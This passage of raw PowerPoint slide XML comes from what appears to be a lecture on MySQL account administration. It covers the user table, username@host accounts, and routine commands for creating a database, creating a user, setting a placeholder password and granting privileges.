              <a:rPr lang="nl-NL" sz="800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>| root             | 127.0.0.1  |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>| root             | ::1        |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>debian-sys-maint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>| root             | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>| root             | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>wheatgrass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+------------------+------------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>5 rows in set (0.00 sec)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="-171450"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>ser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>account in MySQL is always identified by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>username@host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> combination </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="2" indent="-171450"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>entry means that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>username will only be allowed to connect with the database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>from that host </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="2" indent="-171450"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>If a user is allowed to connect from anywhere, the host entry in the second column for such a user is expressed by the symbol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="2" indent="-171450"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>So the 4 root accounts are different, even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>though the usernames for all three are the same and the hosts for all three accounts are on the same machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="2" indent="-171450"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/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44715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Installation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029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>show databases;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show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tables in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>These tables are for maintenance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>system and with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>documentation </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Ask shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>to switch to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>database, followed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>request to list </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>table of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>database </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql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  <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>describe user;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>system is capable of storing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>42 different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>attributes for a database account </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>attributes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>that end in the suffix ‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>stand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>that you may either authorize or deny for the individual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>create a new database a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and then create a new user account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> with full access to the database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; create database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; create user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; set password for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = PASSWORD( ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>xxxxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>’ ); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" b="1" dirty="0" smtClean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500" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; grant all on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.* to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; show grants for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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944793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Installation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sz="1800" dirty="0" smtClean="0"/>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>PASSWORD( ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>xxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>’ )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>actual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>password between single or double quotes, creates an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>encrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> password. If you don’t mind the password being stored in clear text, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>a new new account by </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>   </a:t>
            </a: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create user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager@localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> identified by ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>xxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>’;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2000" dirty="0"/>
              <a:t>In the syntax </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>above, we limited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>’s access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>To let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>from anywhere (obviously a risky thing to do), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>use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create user Manager@%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  <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>just say </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; create user Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the default of ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>@%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>’, where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>wildcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, is assumed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>anyway for the host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
